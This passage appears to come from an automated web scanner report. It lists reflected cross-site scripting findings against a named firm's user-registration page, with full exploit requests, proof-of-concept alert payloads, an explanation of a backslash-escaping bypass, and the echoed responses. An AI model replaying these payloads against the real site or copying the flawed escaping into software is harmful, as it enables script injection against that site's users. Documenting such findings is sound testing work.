Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B4%5D request parameter is copied into the HTML document as plain text between tags. The payload e512f<script>alert(1)</script>d93c4114a89 was submitted in the FE%5Bfe_users%5D%5B4%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0e512f<script>alert(1)</script>d93c4114a89&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:58 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0e512f<script>alert(1)</script>d93c4114a89');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...

4.170. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B5%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B5%5D request parameter is copied into the HTML document as plain text between tags. The payload bec11<script>alert(1)</script>fe856d5f00 was submitted in the FE%5Bfe_users%5D%5B5%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0bec11<script>alert(1)</script>fe856d5f00&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:22:14 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27282

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0bec11<script>alert(1)</script>fe856d5f00');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...

4.171. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B6%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B6%5D request parameter is copied into the HTML document as plain text between tags. The payload 27942<script>alert(1)</script>05f26062564 was submitted in the FE%5Bfe_users%5D%5B6%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=027942<script>alert(1)</script>05f26062564&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:22:34 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','027942<script>alert(1)</script>05f26062564');
   /*]]>
...[SNIP]...

4.172. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Baddress%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Baddress%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ef89\'%3balert(1)//3af9dc914c6 was submitted in the FE%5Bfe_users%5D%5Baddress%5D parameter. This input was echoed as 7ef89\\';alert(1)//3af9dc914c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=37ef89\'%3balert(1)//3af9dc914c6&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:23:49 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
'FE[fe_users][password]','3');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_form','FE[fe_users][address]','37ef89\\';alert(1)//3af9dc914c6');
   updateForm('fe_users_form','FE[fe_users][telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com');
   updateF
...[SNIP]...

4.173. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bcity%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bcity%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21752\'%3balert(1)//21ef1916b41 was submitted in the FE%5Bfe_users%5D%5Bcity%5D parameter. This input was echoed as 21752\\';alert(1)//21ef1916b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=321752\'%3balert(1)//21ef1916b41&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:24:46 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','321752\\';alert(1)//21ef1916b41');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm(
...[SNIP]...

4.174. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bcompany%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bcompany%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece68\'%3balert(1)//0b41804b4b8 was submitted in the FE%5Bfe_users%5D%5Bcompany%5D parameter. This input was echoed as ece68\\';alert(1)//0b41804b4b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3ece68\'%3balert(1)//0b41804b4b8&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:25:35 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
form','FE[fe_users][language]','');
   updateForm('fe_users_form','FE[fe_users][comments]','');
   updateForm('fe_users_form','FE[fe_users][www]','');
   updateForm('fe_users_form','FE[fe_users][company]','3ece68\\';alert(1)//0b41804b4b8');
   updateForm('fe_users_form','FE[fe_users][image]','');
   updateForm('fe_users_form','FE[fe_users][disable]','0');
   updateForm('fe_users_form','FE[fe_users][date_of_birth]','');
   updateForm('fe_users
...[SNIP]...

4.175. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bemail%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bemail%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7283e\'%3balert(1)//d945f4f3b76 was submitted in the FE%5Bfe_users%5D%5Bemail%5D parameter. This input was echoed as 7283e\\';alert(1)//d945f4f3b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com7283e\'%3balert(1)//d945f4f3b76&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:25:54 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27504

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
address]','3');
   updateForm('fe_users_form','FE[fe_users][telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com7283e\\';alert(1)//d945f4f3b76');
   updateForm('fe_users_form','FE[fe_users][gender]','0');
   updateForm('fe_users_form','FE[fe_users][first_name]','');
   updateForm('fe_users_form','FE[fe_users][last_name]','');
   updateForm('fe_users
...[SNIP]...

4.176. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bgender%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bgender%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1afa4\'%3balert(1)//fd66386815e was submitted in the FE%5Bfe_users%5D%5Bgender%5D parameter. This input was echoed as 1afa4\\';alert(1)//fd66386815e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=01afa4\'%3balert(1)//fd66386815e&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
